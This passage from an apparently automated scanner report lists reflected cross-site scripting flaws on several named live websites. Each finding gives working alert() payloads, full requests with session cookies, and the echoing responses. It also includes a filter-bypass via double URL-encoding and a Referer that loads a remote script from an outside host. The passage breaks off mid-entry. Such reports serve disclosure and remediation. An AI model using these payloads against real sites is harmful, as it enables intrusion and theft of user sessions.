2.4. http://cdn-forums.scout.com/adfeed.ashx [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-forums.scout.com
Path:   /adfeed.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9bd93<img%20src%3da%20onerror%3dalert(1)>5b0d6ee6d38 was submitted in the callback parameter. This input was echoed as 9bd93<img src=a onerror=alert(1)>5b0d6ee6d38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /adfeed.ashx?s=143&p=undefined&c=undefined&format=json&callback=$.showAd.cacheAdCodes9bd93<img%20src%3da%20onerror%3dalert(1)>5b0d6ee6d38 HTTP/1.1
Host: cdn-forums.scout.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scout.com/search.aspx?s=143&p=19&sitesearch=scout.com&q=1%3CScRiPt%2Fxss%20src%3Dhttp%3A%2F%2Fxss.cx%2Fcx.js%3F964407%3E%3C%2FScRiPt%3E
Cookie: __utma=202704078.1310038920.1308590023.1308597903.1310666427.3; __utmz=202704078.1310666427.3.3.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; UnicaNIODID=pRNfMHC9Ow1-XCX0Xfv; RefId=0; BrandId=0; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Server: Mbrd8
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Website-Assembly-Version: 2.21.0.0
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Content-Length: 132
Date: Tue, 19 Jul 2011 12:05:00 GMT
Connection: close
Akamai: True

$.showAd.cacheAdCodes9bd93<img src=a onerror=alert(1)>5b0d6ee6d38({"ads":[],"contentTypeId":0,"pageId":0,"siteId":143,"type":"MSN"})

2.5. http://networkpresence.com.au/index.php/Services/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://networkpresence.com.au
Path:   /index.php/Services/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32a10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e462681da7d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32a10"><script>alert(1)</script>462681da7d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /index.php/Services/?32a10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e462681da7d9=1 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:01:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:01:48 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23909
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<link href="/index.php/Services/feed/rss.html?32a10"><script>alert(1)</script>462681da7d9=1" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.6. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://networkpresence.com.au
Path:   /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 5b7f5<img%20src%3da%20onerror%3dalert(1)>06ea9cea3f3 was submitted in the h parameter. This input was echoed as 5b7f5<img src=a onerror=alert(1)>06ea9cea3f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php?w=520&h=3085b7f5<img%20src%3da%20onerror%3dalert(1)>06ea9cea3f3&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Length: 5186
Connection: close
Content-Type: text/css; charset: UTF-8

/*
// "Frontpage Slideshow" Module for Joomla! 1.5.x - Version 1.7.2
// Copyright (c) 2006 - 2008 JoomlaWorks, a Komrade LLC company.
// This code cannot be redistributed without permission from Jo
...[SNIP]...
33;width:712px;}
#fpss-container {/*clear:both;*/padding:0;margin:0;position:relative;text-align:left;width:712px;}
#fpss-slider {overflow:hidden;background:none;/*clear:both;*/width:520px;height:3085b7f5<img src=a onerror=alert(1)>06ea9cea3f3px;}

#slide-loading {background:#000 url(loading_black.gif) no-repeat center;margin:0;padding:0;width:520px;height:3085b7f5<img src=a onerror=alert(1)>
...[SNIP]...

2.7. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [sw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://networkpresence.com.au
Path:   /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

Issue detail

The value of the sw request parameter is copied into the HTML document as plain text between tags. The payload 67451<img%20src%3da%20onerror%3dalert(1)>da9243592bc was submitted in the sw parameter. This input was echoed as 67451<img src=a onerror=alert(1)>da9243592bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php?w=520&h=308&sw=19267451<img%20src%3da%20onerror%3dalert(1)>da9243592bc HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:01:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Length: 4976
Connection: close
Content-Type: text/css; charset: UTF-8

/*
// "Frontpage Slideshow" Module for Joomla! 1.5.x - Version 1.7.2
// Copyright (c) 2006 - 2008 JoomlaWorks, a Komrade LLC company.
// This code cannot be redistributed without permission from Jo
...[SNIP]...
lidetext {margin:0;padding:4px 12px;}

/* --- Navigation Buttons --- */

#navi-outer {position:absolute;    top:0; right:0;/*clear:both;*/    margin:0;    padding:0;    color:#000000;    overflow:hidden;width:19267451<img src=a onerror=alert(1)>da9243592bcpx;height:308px;    background-color: #ffffff;}
#navi-outer ul {padding:0;margin:0;background:none;text-align:left;}
#navi-outer li {display:inline;padding:0;margin:0;border:none;height:56px;list-style:
...[SNIP]...

2.8. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://networkpresence.com.au
Path:   /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

Issue detail

The value of the w request parameter is copied into the HTML document as plain text between tags. The payload c6ccf<img%20src%3da%20onerror%3dalert(1)>59e73d38178 was submitted in the w parameter. This input was echoed as c6ccf<img src=a onerror=alert(1)>59e73d38178 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php?w=520c6ccf<img%20src%3da%20onerror%3dalert(1)>59e73d38178&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Length: 5054
Connection: close
Content-Type: text/css; charset: UTF-8

/*
// "Frontpage Slideshow" Module for Joomla! 1.5.x - Version 1.7.2
// Copyright (c) 2006 - 2008 JoomlaWorks, a Komrade LLC company.
// This code cannot be redistributed without permission from Jo
...[SNIP]...
:0px solid #333;width:712px;}
#fpss-container {/*clear:both;*/padding:0;margin:0;position:relative;text-align:left;width:712px;}
#fpss-slider {overflow:hidden;background:none;/*clear:both;*/width:520c6ccf<img src=a onerror=alert(1)>59e73d38178px;height:308px;}

#slide-loading {background:#000 url(loading_black.gif) no-repeat center;margin:0;padding:0;width:520c6ccf<img src=a onerror=alert(1)>
...[SNIP]...

2.9. https://secure2.internode.on.net/nodestore/cart/build [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure2.internode.on.net
Path:   /nodestore/cart/build

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34f6b"><a>84f479d6a18 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nodestore/cart/build34f6b"><a>84f479d6a18?customer_kind=residential&broadband=easy_naked&value_packs=5 HTTP/1.1
Host: secure2.internode.on.net
Connection: keep-alive
Referer: https://secure2.internode.on.net/nodestore/products/residential
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1449462245.1311069834.1311069834.1311069834.1; __utmb=1.7.10.1311069834; __utmc=1; __utmz=1.1311069834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); nodestore_session=2cdf3c71-baba97f6-2cdf3c70-baba97f6-00000002-qm5papuuccc7vpckhvg6v67vv7

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 10:11:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4302
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html><html>
<head>
   <title>NodeStore :: Internode</title>    <meta name="copyright" content="Internode Pty Ltd" >
<meta name="keywords" content="internode, broadband, adsl, adsl2+, plans, prici
...[SNIP]...
<body id="cart_build34f6b"><a>84f479d6a18">
...[SNIP]...

2.10. https://secure2.internode.on.net/nodestore/cart/save/order/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure2.internode.on.net
Path:   /nodestore/cart/save/order/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e977"><img%20src%3da%20onerror%3dalert(1)>be29bd4cc6f was submitted in the REST URL parameter 3. This input was echoed as 5e977"><img src=a onerror=alert(1)>be29bd4cc6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /nodestore/cart/save5e977"><img%20src%3da%20onerror%3dalert(1)>be29bd4cc6f/order/?format=json&password HTTP/1.1
Host: secure2.internode.on.net
Connection: keep-alive
Referer: https://secure2.internode.on.net/nodestore/checkout/customer/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1449462245.1311069834.1311069834.1311069834.1; __utmb=1.7.10.1311069834; __utmc=1; __utmz=1.1311069834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); nodestore_session=2cdf3c71-baba97f6-2cdf3c70-baba97f6-00000002-qm5papuuccc7vpckhvg6v67vv7

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 10:11:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4350
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html><html>
<head>
   <title>NodeStore :: Internode</title>    <meta name="copyright" content="Internode Pty Ltd" >
<meta name="keywords" content="internode, broadband, adsl, adsl2+, plans, prici
...[SNIP]...
<body id="cart_save5e977"><img src=a onerror=alert(1)>be29bd4cc6f">
...[SNIP]...

2.11. https://secure2.internode.on.net/nodestore/cart/save/order/undefined [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure2.internode.on.net
Path:   /nodestore/cart/save/order/undefined

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 890f6"><img%20src%3da%20onerror%3dalert(1)>f38abd0499a was submitted in the REST URL parameter 3. This input was echoed as 890f6"><img src=a onerror=alert(1)>f38abd0499a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /nodestore/cart/save890f6"><img%20src%3da%20onerror%3dalert(1)>f38abd0499a/order/undefined?format=json&password HTTP/1.1
Host: secure2.internode.on.net
Connection: keep-alive
Referer: https://secure2.internode.on.net/nodestore/cart/save5e977%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3Ebe29bd4cc6f/order/?format=json&password
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1449462245.1311069834.1311069834.1311069834.1; __utmb=1.7.10.1311069834; __utmc=1; __utmz=1.1311069834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); nodestore_session=2cdf3c71-baba97f6-2cdf3c70-baba97f6-00000002-qm5papuuccc7vpckhvg6v67vv7

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 10:14:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4350
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html><html>
<head>
   <title>NodeStore :: Internode</title>    <meta name="copyright" content="Internode Pty Ltd" >
<meta name="keywords" content="internode, broadband, adsl, adsl2+, plans, prici
...[SNIP]...
<body id="cart_save890f6"><img src=a onerror=alert(1)>f38abd0499a">
...[SNIP]...

2.12. https://secure2.internode.on.net/nodestore/cart/save5e977%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3Ebe29bd4cc6f/order/a [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure2.internode.on.net
Path:   /nodestore/cart/save5e977%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3Ebe29bd4cc6f/order/a

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8b947<img%20src%3da%20onerror%3dalert(1)>8cd3a062984 was submitted in the REST URL parameter 3. This input was echoed as 8b947<img src=a onerror=alert(1)>8cd3a062984 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /nodestore/cart/save5e977%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3Ebe29bd4cc6f8b947<img%20src%3da%20onerror%3dalert(1)>8cd3a062984/order/a HTTP/1.1
Host: secure2.internode.on.net
Connection: keep-alive
Referer: https://secure2.internode.on.net/nodestore/cart/save5e977%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3Ebe29bd4cc6f/order/?format=json&password
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1449462245.1311069834.1311069834.1311069834.1; __utmb=1.7.10.1311069834; __utmc=1; __utmz=1.1311069834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); nodestore_session=2cdf3c71-baba97f6-2cdf3c70-baba97f6-00000002-qm5papuuccc7vpckhvg6v67vv7

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 10:14:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4476
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html><html>
<head>
   <title>NodeStore :: Internode</title>    <meta name="copyright" content="Internode Pty Ltd" >
<meta name="keywords" content="internode, broadband, adsl, adsl2+, plans, prici
...[SNIP]...
<img src=a onerror=alert(document.location)>be29bd4cc6f8b947<img src=a onerror=alert(1)>8cd3a062984">
...[SNIP]...

2.13. http://www.codero.com/images/design/banner-green-bundle.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.codero.com
Path:   /images/design/banner-green-bundle.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84c13"><script>alert(1)</script>b2bab450492 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images84c13"><script>alert(1)</script>b2bab450492/design/banner-green-bundle.png?time=1308058010 HTTP/1.1
Host: www.codero.com
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=59liuo1tqqa3fjr243l6e846j4

Response

HTTP/1.1 404 This page does not exist
Date: Tue, 19 Jul 2011 02:01:30 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 32034
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="X-UA-Compatible" c
...[SNIP]...
<link rel="canonical" href="http://www.codero.com/images84c13"><script>alert(1)</script>b2bab450492/design/banner-green-bundle.png" />
...[SNIP]...

2.14. http://www.codero.com/images/design/banner-priceMatch.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.codero.com
Path:   /images/design/banner-priceMatch.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d40e9"><script>alert(1)</script>30c84889aac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imagesd40e9"><script>alert(1)</script>30c84889aac/design/banner-priceMatch.png?time=1308058010 HTTP/1.1
Host: www.codero.com
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=59liuo1tqqa3fjr243l6e846j4

Response

HTTP/1.1 404 This page does not exist
Date: Tue, 19 Jul 2011 02:01:29 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 31999
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="X-UA-Compatible" c
...[SNIP]...
<link rel="canonical" href="http://www.codero.com/imagesd40e9"><script>alert(1)</script>30c84889aac/design/banner-priceMatch.png" />
...[SNIP]...

2.15. http://www.codero.com/images/design/banner_50off-promo.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.codero.com
Path:   /images/design/banner_50off-promo.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e54f"><script>alert(1)</script>9f713150a78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images2e54f"><script>alert(1)</script>9f713150a78/design/banner_50off-promo.png?time=1308169754 HTTP/1.1
Host: www.codero.com
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=59liuo1tqqa3fjr243l6e846j4

Response

HTTP/1.1 404 This page does not exist
Date: Tue, 19 Jul 2011 02:01:33 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 32045
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="X-UA-Compatible" c
...[SNIP]...
<link rel="canonical" href="http://www.codero.com/images2e54f"><script>alert(1)</script>9f713150a78/design/banner_50off-promo.png" />
...[SNIP]...

2.16. http://www.codero.com/images/design/banner_certified-expertise.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.codero.com
Path:   /images/design/banner_certified-expertise.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 106c4"><script>alert(1)</script>1ca562d2af6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images106c4"><script>alert(1)</script>1ca562d2af6/design/banner_certified-expertise.png?time=1308058010 HTTP/1.1
Host: www.codero.com
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=59liuo1tqqa3fjr243l6e846j4

Response

HTTP/1.1 404 This page does not exist
Date: Tue, 19 Jul 2011 02:01:32 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 32061
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="X-UA-Compatible" c
...[SNIP]...
<link rel="canonical" href="http://www.codero.com/images106c4"><script>alert(1)</script>1ca562d2af6/design/banner_certified-expertise.png" />
...[SNIP]...

2.17. http://www.codero.com/images/design/banner_i7-promo.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.codero.com
Path:   /images/design/banner_i7-promo.png

Issue detail

